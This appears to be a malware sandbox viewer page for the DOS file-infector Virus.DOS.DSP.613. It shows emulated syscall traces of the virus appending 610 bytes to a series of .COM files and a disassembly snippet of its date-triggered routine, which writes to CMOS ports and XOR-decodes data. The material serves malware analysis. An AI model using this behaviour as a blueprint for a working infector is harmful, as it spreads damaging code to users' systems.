Sample viewer

vx.netlux.org/Virus.DOS.DSP.613

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:19.300115978Z 78 PC: 13f84 | Find first file
2018-12-17T23:06:19.306975045Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.308087439Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.328062454Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:19.344407577Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.351777025Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.35317036Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.355870726Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.359660565Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.360982912Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.362530474Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.370778292Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.372792044Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.380847074Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.383913779Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.385334773Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.395014863Z 61 PC: 13e83 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:06:19.402656374Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.409003518Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.410574677Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.414153382Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.416907446Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.418443383Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.4205558Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.428408931Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.43057187Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.439560176Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.442345063Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.443610933Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.45669055Z 61 PC: 13e83 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:06:19.463274915Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.469774471Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.471302306Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.474160081Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.476624308Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.478214538Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.479887036Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.487494194Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.489798765Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.498261988Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.500766933Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.502462034Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.511878577Z 61 PC: 13e83 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:06:19.518194378Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.524342793Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.525826301Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.528258882Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.530821265Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.532063299Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.53322673Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.541891857Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.544111482Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.56180309Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.564538853Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.565869383Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.575241749Z 61 PC: 13e83 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:06:19.582253497Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.589172505Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.590501314Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.593031857Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.596315233Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.598257797Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.599466367Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.607237588Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.609097864Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.616990495Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.619922218Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.621123872Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.630573165Z 61 PC: 13e83 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:06:19.637399131Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.643351578Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.644499885Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.647443149Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.649925614Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.651071212Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.65295743Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.661247526Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.663863902Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.671877386Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.67422574Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.675246449Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.684930066Z 61 PC: 13e83 | Open file (Filename = 'PAH.COM')
2018-12-17T23:06:19.691390181Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:19.697545953Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:19.699268826Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:19.701831627Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:19.704387351Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:19.706098101Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:19.707298995Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:19.715478084Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:19.718975989Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.727252275Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.730198274Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.733484641Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:19.746068555Z 61 PC: 13e83 | Open file (Filename = 'TEST.COM')
2018-12-17T23:06:19.752485404Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:19.759414327Z 62 PC: 13f1e | Close file
2018-12-17T23:06:19.761043967Z 79 PC: 13f90 | Find next file
2018-12-17T23:06:19.763267285Z 25 PC: 13f9b | Get default drive
2018-12-17T23:06:19.764768046Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-17T23:06:19.765862479Z 59 PC: 13fce | Change current directory
2018-12-17T23:06:19.771337309Z 78 PC: 13fd5 | Find first file
2018-12-17T23:06:19.780351729Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:19.781493361Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.13416457Z 61 PC: 13e83 | Open file (Filename = 'EDIT.COM')
2018-12-17T23:06:20.14242123Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.148490971Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.150108311Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.15404735Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.157182281Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.158773924Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.160364796Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.167870296Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.169827253Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.177174209Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.180862858Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:20.182037627Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.190997597Z 61 PC: 13e83 | Open file (Filename = 'FORMAT.COM')
2018-12-17T23:06:20.198216716Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:20.20345052Z 66 PC: 13ea7 | Move file pointer
2018-12-17T23:06:20.204705989Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.20751912Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.209786814Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.212284506Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.215455842Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.216727559Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.218018158Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.225860059Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.228025362Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.235473419Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.238797379Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:20.239920486Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.249664776Z 61 PC: 13e83 | Open file (Filename = 'KEYB.COM')
2018-12-17T23:06:20.25767787Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:20.264096165Z 66 PC: 13ea7 | Move file pointer
2018-12-17T23:06:20.265651746Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.269220139Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.270468407Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.272877227Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.275769643Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.276981726Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.278982876Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.296144421Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.29826117Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.305511643Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.312922184Z 47 PC: 13e48 | Get disk transfer address
2018-12-17T23:06:20.313966284Z 67 PC: 13e7e | Get or set file attributes
2018-12-17T23:06:20.323485494Z 61 PC: 13e83 | Open file (Filename = 'SYS.COM')
2018-12-17T23:06:20.330797411Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-17T23:06:20.336120971Z 66 PC: 13ea7 | Move file pointer
2018-12-17T23:06:20.337532945Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:06:20.340630998Z 66 PC: 13ebb | Move file pointer
2018-12-17T23:06:20.342621142Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-17T23:06:20.345659195Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:06:20.367511408Z 66 PC: 13ede | Move file pointer
2018-12-17T23:06:20.368843187Z 66 PC: 13eed | Move file pointer
2018-12-17T23:06:20.37055643Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-17T23:06:20.378143945Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-17T23:06:20.380018748Z 62 PC: 13f1e | Close file
2018-12-17T23:06:20.387613818Z 79 PC: 13fe1 | Find next file
2018-12-17T23:06:20.393468027Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-17T23:06:20.394922232Z 42 PC: 13ff4 | Get date
0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36
2018-12-17T23:06:20.398047088Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T23:06:20.404000603Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:32.762413597Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:32.768653292Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:32.769751969Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:32.794949696Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:32.806132393Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:32.81240667Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:32.814060309Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:32.817016874Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:32.820470892Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:32.82194051Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:32.823187703Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-25T12:43:32.831905173Z 2 PC: 13f0f | Character output (Char = 'b2')
2018-12-25T12:43:32.833942314Z 62 PC: 13f1e | Close file
2018-12-25T12:43:32.841970992Z 79 PC: 13f90 | Find next file
2018-12-25T12:43:32.844984641Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.845998296Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.855738417Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.863332979Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.869796336Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.871259368Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.874574611Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.877024234Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.878552079Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.885370777Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.89295478Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.894965218Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.903636611Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.906065745Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.907086792Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.917204426Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.923826041Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.930199184Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.933720142Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.936713042Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.939426033Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.941288057Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:32.942472485Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:32.95031318Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:32.95260169Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:32.960351561Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:32.962771736Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:32.964068602Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:32.97370321Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:32.980171307Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:32.986884856Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:32.990866127Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:32.993808804Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:32.9966403Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:32.998531008Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.00005454Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.00871138Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.01110163Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.018691957Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.021120857Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.022634699Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.031984302Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.038762563Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.045668934Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.04699954Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.049568482Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.053546964Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.05484111Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.056105595Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.064789878Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.066739545Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.075210888Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.078401558Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.079526385Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.088975441Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.095823401Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.102098734Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.103373287Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.110496159Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.113159576Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.114497788Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.116743134Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.125392152Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.127768114Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.13716109Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.139786654Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.141741282Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.1533069Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.160017214Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:33.166441096Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:33.16883711Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:33.171804046Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:33.174625197Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:33.177397578Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:33.17911846Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:33.187279574Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:33.190225453Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.198780462Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.201965784Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.203788332Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:33.213787971Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:33.220645569Z 63 PC: 13e96 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:43:33.223425246Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:33.225856166Z 79 PC: 13f90 | Find next file (See above)
2018-12-25T12:43:33.22919696Z 25 PC: 13f9b | Get default drive
2018-12-25T12:43:33.230736636Z 14 PC: 13fc7 | Set default drive (Drive = 'C')
2018-12-25T12:43:33.232963565Z 59 PC: 13fce | Change current directory
2018-12-25T12:43:33.239014211Z 78 PC: 13fd5 | Find first file
2018-12-25T12:43:33.248658082Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:33.249965758Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.0196208Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.026531025Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.032959412Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.034277064Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.036836671Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.041284174Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.043301958Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.044907506Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.05227271Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.054631541Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.061930496Z 79 PC: 13fe1 | Find next file
2018-12-25T12:43:34.065986378Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.067162738Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.076540444Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.084037801Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.08991348Z 66 PC: 13ea7 | Move file pointer
2018-12-25T12:43:34.092958804Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.096606084Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.0983099Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.101317409Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.1050722Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.106681553Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.108410318Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.117897967Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.120287971Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.128593356Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.133380116Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.135027038Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.144361408Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.15173805Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.157271845Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.158864138Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.162271162Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.163723947Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.166409287Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.16992926Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.171650613Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.173360168Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.181859264Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.18422909Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.19149445Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.198285212Z 47 PC: 13e48 | Get disk transfer address (See above)
2018-12-25T12:43:34.199645432Z 67 PC: 13e7e | Get or set file attributes (See above)
2018-12-25T12:43:34.209024558Z 61 PC: 13e83 | Open file (See above)
2018-12-25T12:43:34.216480225Z 63 PC: 13e96 | Read file or device (See above)
2018-12-25T12:43:34.222127015Z 66 PC: 13ea7 | Move file pointer (See above)
2018-12-25T12:43:34.223723455Z 63 PC: 13eb1 | Read file or device (See above)
2018-12-25T12:43:34.226832661Z 66 PC: 13ebb | Move file pointer (See above)
2018-12-25T12:43:34.228538532Z 64 PC: 13ec5 | Write file or device (See above)
2018-12-25T12:43:34.23109573Z 64 PC: 13ed4 | Write file or device (See above)
2018-12-25T12:43:34.235568495Z 66 PC: 13ede | Move file pointer (See above)
2018-12-25T12:43:34.237180291Z 66 PC: 13eed | Move file pointer (See above)
2018-12-25T12:43:34.23877964Z 64 PC: 13f05 | Write file or device (See above)
2018-12-25T12:43:34.24774722Z 2 PC: 13f0f | Character output (See above)
2018-12-25T12:43:34.249869169Z 62 PC: 13f1e | Close file (See above)
2018-12-25T12:43:34.257949039Z 79 PC: 13fe1 | Find next file (See above)
2018-12-25T12:43:34.265016803Z 14 PC: 13ff0 | Set default drive (Drive = 'A')
2018-12-25T12:43:34.266296636Z 42 PC: 13ff4 | Get date
0x13ff4: cmp al, 4
0x13ff6: jne 0x1404a
0x13ff8: mov dx, 0x70
0x13ffb: mov ax, cx
0x13ffd: out dx, ax
0x13ffe: mov dx, 0x71
0x14001: in al, dx
0x14002: inc al
0x14004: out dx, al
0x14005: loop 0x13ff8
0x14007: push es
0x14008: push bp
0x14009: mov dx, word ptr [0xffb7]
0x1400d: add dx, 0x100
0x14011: add dx, 0x265
0x14015: sub dx, 0x2a
0x14018: mov bx, dx
0x1401a: mov cx, 0
0x1401d: mov al, byte ptr [bx]
0x1401f: xor al, 0x36
2018-12-25T12:43:34.26861043Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:43:34.275698164Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15492,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:32.762592468Z 78 PC: 13f84 | Find first file
2018-12-25T12:43:32.768773421Z 47 PC: 13e48 | Get disk transfer address
2018-12-25T12:43:32.769989487Z 67 PC: 13e7e | Get or set file attributes
2018-12-25T12:43:32.794981424Z 61 PC: 13e83 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:32.801914121Z 63 PC: 13eb1 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:43:32.807649852Z 66 PC: 13ebb | Move file pointer
2018-12-25T12:43:32.808835931Z 64 PC: 13ec5 | Write file or device (Write 1 bytes on handle 5)
2018-12-25T12:43:32.811544365Z 64 PC: 13ed4 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:43:32.813987605Z 66 PC: 13ede | Move file pointer
2018-12-25T12:43:32.815188357Z 66 PC: 13eed | Move file pointer
2018-12-25T12:43:32.816543874Z 64 PC: 13f05 | Write file or device (Write 610 bytes on handle 5)
2018-12-25T12:43:32.824436284Z 2 PC: 13f0f | Character output (Char = 'b2')
